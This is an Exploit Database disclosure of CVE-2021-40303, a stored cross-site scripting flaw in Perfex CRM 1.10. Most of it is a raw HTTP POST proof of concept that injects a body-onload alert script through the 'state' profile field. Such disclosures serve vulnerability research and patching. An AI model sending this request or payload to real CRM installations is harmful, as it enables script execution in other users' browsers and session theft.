Headline
CVE-2021-40303: Offensive Security’s Exploit Database Archive
perfex crm 1.10 is vulnerable to Cross Site Scripting (XSS) via /clients/profile.
# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)
# Date: 05/07/2021
# Exploit Author: Alhasan Abbas (exploit.msf)
# Vendor Homepage: https://www.perfexcrm.com/
# Version: 1.10
# Tested on: windows 10
Vunlerable page: /clients/profile
POC:
----
POST /clients/profile HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058
Content-Length: 1548
Origin: http://localhost
Connection: close
Referer: http://localhost/clients/profile
Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038
Upgrade-Insecure-Requests: 1
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="profile"
1
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="profile_image"; filename=""
Content-Type: application/octet-stream
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="firstname"
adfgsg
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="lastname"
fsdgfdg
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="company"
test
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="vat"
1
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="phonenumber"
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="country"
105
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="city"
asdf
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="address"
asdf
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="zip"
313
-----------------------------325278703021926100783634528058
Content-Disposition: form-data; name="state"
""><body onload=alert("XSS")>">
-----------------------------325278703021926100783634528058--
then any one open profile page in user the xss its executed